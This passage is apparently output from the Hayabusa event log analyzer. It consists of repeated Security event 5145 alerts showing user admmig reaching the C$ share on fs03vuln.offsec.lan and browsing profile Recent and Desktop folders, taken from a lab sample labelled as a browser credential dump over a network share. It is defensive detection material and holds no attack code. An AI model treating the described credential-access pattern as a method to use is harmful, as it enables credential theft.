2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.673 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.692 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.707 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.723 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.739 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.754 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.770 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.785 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.817 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.848 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.864 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.895 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.911 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.957 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.989 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:31.004 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 
